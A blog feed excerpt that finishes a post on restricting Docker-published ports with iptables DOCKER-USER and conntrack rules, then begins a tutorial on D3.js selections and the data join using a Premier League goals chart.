&lt;li&gt;Don&#39;t indiscriminately bind to &lt;code&gt;0.0.0.0&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Don&#39;t open a port that you don&#39;t want to be open&lt;/li&gt;
&lt;li&gt;Have your VPS behind a hardware firewall&lt;/li&gt;
&lt;/ol&gt;
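&lt;p&gt;For the first rule, a minimal sketch: &lt;code&gt;-p&lt;/code&gt; accepts an optional host address in front of the port, so you can publish to just the interface you mean. The container name and password below are placeholders, and &lt;code&gt;100.64.0.10&lt;/code&gt; is a made-up tailnet address standing in for whatever your machine actually has:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;# Only reachable from the host itself&lt;br /&gt;$ docker run --name some-postgres -e POSTGRES_PASSWORD=a-long-random-password -d -p 127.0.0.1:5432:5432 postgres&lt;br /&gt;&lt;br /&gt;# Or: only reachable via one specific interface address (hypothetical tailnet IP)&lt;br /&gt;$ docker run --name some-postgres -e POSTGRES_PASSWORD=a-long-random-password -d -p 100.64.0.10:5432:5432 postgres&lt;/code&gt;&lt;/pre&gt;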
&lt;p&gt;The trouble is, I&#39;m extremely cheap and I don&#39;t want to change my VPS. And I&#39;m also extremely forgetful, so I&#39;ll use &lt;code&gt;-p 5432:5432&lt;/code&gt; at the worst possible time.&lt;/p&gt;
&lt;p&gt;Here&#39;s the functionality I want:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If there&#39;s a request for port &lt;code&gt;443&lt;/code&gt; via the machine&#39;s public interface, that should be allowed&lt;/li&gt;
&lt;li&gt;If there&#39;s a request for any other port via the machine&#39;s public interface, that should be denied&lt;/li&gt;
&lt;li&gt;Containers should be able to call out to the internet with impunity, which will require receiving some packets back&lt;/li&gt;
&lt;li&gt;Traffic on other interfaces, such as &lt;code&gt;tailscale0&lt;/code&gt;, should be accepted by default&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What I did: added some &lt;code&gt;iptables&lt;/code&gt; rules to the &lt;code&gt;DOCKER-USER&lt;/code&gt; chain, which Docker adds to the filter table as a hook for user customisation.&lt;/p&gt;
&lt;p&gt;First we reset all our shenanigans:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;--table&lt;/span&gt; filter &lt;span class=&quot;token parameter variable&quot;&gt;--flush&lt;/span&gt; FORWARD&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;--table&lt;/span&gt; nat &lt;span class=&quot;token parameter variable&quot;&gt;--flush&lt;/span&gt; PREROUTING&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;--table&lt;/span&gt; nat &lt;span class=&quot;token parameter variable&quot;&gt;--flush&lt;/span&gt; POSTROUTING&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;rm&lt;/span&gt; /etc/docker/daemon.json&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; systemctl restart &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And we &lt;em&gt;could&lt;/em&gt; add these rules:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-I&lt;/span&gt; DOCKER-&lt;span class=&quot;token environment constant&quot;&gt;USER&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; conntrack &lt;span class=&quot;token parameter variable&quot;&gt;--ctstate&lt;/span&gt; RELATED,ESTABLISHED &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; ACCEPT&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; DOCKER-&lt;span class=&quot;token environment constant&quot;&gt;USER&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-i&lt;/span&gt; ens3 &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; tcp &lt;span class=&quot;token parameter variable&quot;&gt;--dport&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;443&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; ACCEPT&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; DOCKER-&lt;span class=&quot;token environment constant&quot;&gt;USER&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-i&lt;/span&gt; ens3 &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; DROP&lt;/code&gt;&lt;/pre&gt;
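&lt;p&gt;But that won&#39;t work because NAT &lt;em&gt;rewrites&lt;/em&gt; the destination port before the packet reaches our filter rules. By the time they kick in, &lt;code&gt;--dport&lt;/code&gt; sees the container&#39;s port rather than the port the request originally arrived on, so a container listening on 443 internally would be let through &lt;em&gt;whatever&lt;/em&gt; host port it was published on.&lt;/p&gt;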
&lt;p&gt;Instead, this needs a stateful firewall. That&#39;s exactly what &lt;code&gt;conntrack&lt;/code&gt; does. It&#39;s another kernel module provided as part of the netfilter project, and will let us have knowledge of what our NAT-modified packet looked like before the switcheroo. Let&#39;s &lt;code&gt;sudo iptables --table filter --flush DOCKER-USER&lt;/code&gt; and give it another go. We want to match on the &lt;em&gt;original&lt;/em&gt; destination port of the packet &lt;em&gt;before&lt;/em&gt; we run it through NAT.&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-I&lt;/span&gt; DOCKER-&lt;span class=&quot;token environment constant&quot;&gt;USER&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; conntrack &lt;span class=&quot;token parameter variable&quot;&gt;--ctstate&lt;/span&gt; RELATED,ESTABLISHED &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; ACCEPT&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; DOCKER-&lt;span class=&quot;token environment constant&quot;&gt;USER&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-i&lt;/span&gt; ens3 &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; tcp &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; conntrack &lt;span class=&quot;token parameter variable&quot;&gt;--ctorigdstport&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;443&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; ACCEPT&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; DOCKER-&lt;span class=&quot;token environment constant&quot;&gt;USER&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-i&lt;/span&gt; ens3 &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; DROP&lt;/code&gt;&lt;/pre&gt;
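&lt;p&gt;If you try this yourself, it&#39;s worth listing the chain afterwards to check the rules landed in the order you expect. A sketch using standard &lt;code&gt;iptables&lt;/code&gt; listing flags; what you see will depend on your Docker version and interface names:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;# -n skips DNS lookups, -v shows packet counters and interfaces, --line-numbers shows rule order&lt;br /&gt;# Note: rules added with the iptables command are not persisted across reboots by iptables itself&lt;br /&gt;$ sudo iptables -L DOCKER-USER -n -v --line-numbers&lt;/code&gt;&lt;/pre&gt;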
&lt;p&gt;That appears to have given me the behaviour I want, and I haven&#39;t had any crypto miners installed on my machine since. Looking forward to seeing what the hackers have planned for Thanksgiving and Christmas.&lt;/p&gt;
</content>
  </entry>
  <entry>
    <title>Understanding D3 Selections</title>
    <link href="https://martingaston.dev/articles/understanding-d3-selections/"/>
    <updated>2025-07-09T00:00:00Z</updated>
    <id>https://martingaston.dev/articles/understanding-d3-selections/</id>
    <content xml:lang="en" type="html">&lt;script type=&quot;module&quot;&gt;
  import * as d3 from &quot;https://cdn.jsdelivr.net/npm/d3@7/+esm&quot;;
  window.d3 = d3
&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/understanding-d3-selections/components/bar.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/understanding-d3-selections/components/barRace.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/understanding-d3-selections/components/tree.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/understanding-d3-selections/components/generalUpdateGrid.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/understanding-d3-selections/components/appendRect.js&quot;&gt;&lt;/script&gt;
&lt;blockquote&gt;
&lt;p&gt;On this page, D3 is available globally. Explore in your browser&#39;s development tools as you read: try &lt;code&gt;d3.select(&amp;quot;table&amp;quot;)&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;D3 is a mature library with a rich history that&#39;s famously a bit scary. It&#39;s no wonder LLMs love it for data visualisation.&lt;/p&gt;
&lt;p&gt;To draw an SVG with three circles based off some data, the convention is this:&lt;/p&gt;
&lt;pre class=&quot;language-javascript&quot;&gt;&lt;code class=&quot;language-javascript&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; circleData &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token literal-property property&quot;&gt;y&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token literal-property property&quot;&gt;r&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;50&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;400&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;y&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;r&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;50&lt;/span&gt; 
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;700&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;y&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;r&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;50&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; svg &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; d3&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;select&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;svg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;svg&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;selectAll&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;circle&quot;&lt;/span&gt;&lt;span class=&quot;token 
punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;circleData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;join&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;circle&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cx&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;x&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cy&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;y&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token 
punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;r&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;r&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;fill&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;#FBFBFF&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;svg class=&quot;breakout&quot; id=&quot;svg-1&quot;&gt;
&lt;/svg&gt;
&lt;script type=&quot;module&quot;&gt;
const circleData = [
  { x: 100,  y: 100,  r: 50 },
  { x: 400, y: 100, r: 50 },
  { x: 700, y: 100, r: 50 }
];

const svg = d3.select(&quot;#svg-1&quot;).attr(&quot;width&quot;, &quot;100%&quot;).attr(&quot;viewBox&quot;, [0, 0, 800, 200]);

svg.selectAll(&quot;circle&quot;)
  .data(circleData)
  .join(&quot;circle&quot;)
  .attr(&quot;cx&quot;, d =&gt; d.x)
  .attr(&quot;cy&quot;, d =&gt; d.y)
  .attr(&quot;r&quot;,  d =&gt; d.r)
  .attr(&quot;fill&quot;, &quot;var(--text)&quot;)
&lt;/script&gt;
&lt;p&gt;When I started learning D3, this API boiled my brain. If you&#39;ve never used D3 before, read the code again and see how it resonates with you. If you &lt;em&gt;have&lt;/em&gt; used D3 before, try and remember whether you stumbled on some of its aspects.&lt;/p&gt;
&lt;p&gt;In my case, I really struggled with a few things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Why do I have to &lt;code&gt;selectAll&lt;/code&gt; an element I &lt;em&gt;know&lt;/em&gt; doesn&#39;t exist in order to make new elements?&lt;/li&gt;
&lt;li&gt;Why do I explicitly have to state I&#39;m appending a circle in the &lt;code&gt;join&lt;/code&gt; method when I&#39;ve already mentioned I&#39;m selecting circles in &lt;code&gt;selectAll&lt;/code&gt;? Isn&#39;t that an unnecessary duplication?&lt;/li&gt;
&lt;li&gt;D3 has &lt;code&gt;select&lt;/code&gt; and &lt;code&gt;selectAll&lt;/code&gt;, with the former grabbing the first matching DOM element and the latter selecting all matching elements. The &lt;code&gt;join&lt;/code&gt; method is used for saying &lt;em&gt;what&lt;/em&gt; you want to happen when &lt;code&gt;data&lt;/code&gt; is bound (the &lt;code&gt;circleData&lt;/code&gt; above). While the library won&#39;t explicitly error out, you will never see any example using &lt;code&gt;join&lt;/code&gt; with &lt;code&gt;select&lt;/code&gt;, only &lt;code&gt;selectAll&lt;/code&gt;. Why? Shouldn&#39;t it be possible to &lt;code&gt;select&lt;/code&gt; an element and &lt;code&gt;join&lt;/code&gt; &lt;em&gt;one&lt;/em&gt; item?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;All of these relate to D3&#39;s data join, which is both its secret sauce and its trickiest quality. It&#39;s worth taking the time to understand what&#39;s going on and what I believe D3 is trying to achieve.&lt;/p&gt;
&lt;h2 id=&quot;why-d3%3F&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/understanding-d3-selections/#why-d3%3F&quot;&gt;Why D3?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;To make sense of the data join later, let&#39;s start by thinking about why we&#39;d want to use D3 in the first place. The Web APIs already have ways to create, select and manipulate elements in the DOM, such as &lt;code&gt;document.createElement&lt;/code&gt;, &lt;code&gt;document.querySelector&lt;/code&gt; and &lt;code&gt;document.querySelectorAll&lt;/code&gt;. Why not just use those?&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;⚠️ D3&#39;s remit is much, much broader than manipulating the DOM, but in this article when we say D3 we are going to be solely focused on &lt;a href=&quot;https://d3js.org/d3-selection&quot;&gt;&lt;code&gt;d3-selection&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Consider the bar chart below. It&#39;s an &lt;code&gt;&amp;lt;svg&amp;gt;&lt;/code&gt; populated with a few &lt;code&gt;&amp;lt;rect&amp;gt;&lt;/code&gt; elements, with each bar showing the ⚽ goals scored by &lt;span class=&quot;mateta&quot;&gt;Jean-Philippe Mateta&lt;/span&gt;, &lt;span class=&quot;sarr&quot;&gt;Ismaïla Sarr&lt;/span&gt;, &lt;span class=&quot;eze&quot;&gt;Eberechi Eze&lt;/span&gt; and &lt;span class=&quot;munoz&quot;&gt;Daniel Muñoz&lt;/span&gt; in the 2024/25 Premier League season. You can interact with the chart to alternate between versions created by D3 and the standard Web APIs.&lt;/p&gt;
&lt;bar-intro class=&quot;breakout&quot;&gt;
&lt;/bar-intro&gt;
&lt;blockquote&gt;
&lt;p&gt;🔎 Explore the raw dataset by inspecting the &lt;code&gt;cpfcGoalscorers202425&lt;/code&gt; object from your browser&#39;s development tools&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;You&#39;ll see two identical bar charts, both taking roughly 30 lines of code to create. The primary difference comes from associating the &lt;code&gt;cpfcGoalscorers202425&lt;/code&gt; data with the chart.&lt;/p&gt;
&lt;p&gt;With the standard Web API, we iterate over the players, creating an SVG &lt;code&gt;&amp;lt;rect&amp;gt;&lt;/code&gt; for each of them and appending that to a parent &lt;code&gt;&amp;lt;g&amp;gt;&lt;/code&gt; element:&lt;/p&gt;
&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; g &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; document&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;createElementNS&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;http://www.w3.org/2000/svg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;g&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;cpfcGoalscorers202425&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;player&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; bar &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; document&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;createElementNS&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;http://www.w3.org/2000/svg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;rect&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token 
punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  bar&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;setAttribute&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;fill&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; player&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;color&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  bar&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;setAttribute&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;x&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; player&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;x&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  bar&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;setAttribute&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;y&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;y&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;player&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;goals&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  bar&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;setAttribute&lt;/span&gt;&lt;span 
class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;width&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; barWidth&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  bar&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;setAttribute&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;height&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;height&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;player&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;goals&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;  g&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;appendChild&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;bar&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;y&lt;/code&gt; and &lt;code&gt;height&lt;/code&gt; functions here are defined elsewhere, and map the values to the SVG coordinate space. We&#39;ll hand-wave those away as an implementation detail.&lt;/p&gt;
&lt;p&gt;Let&#39;s compare this with D3. We now have its famous &lt;code&gt;data&lt;/code&gt; and &lt;code&gt;join&lt;/code&gt; methods, and an API which opts for a more declarative style. You first bind &lt;code&gt;data&lt;/code&gt; to your selection, and then &lt;code&gt;join&lt;/code&gt; the data to elements:&lt;/p&gt;
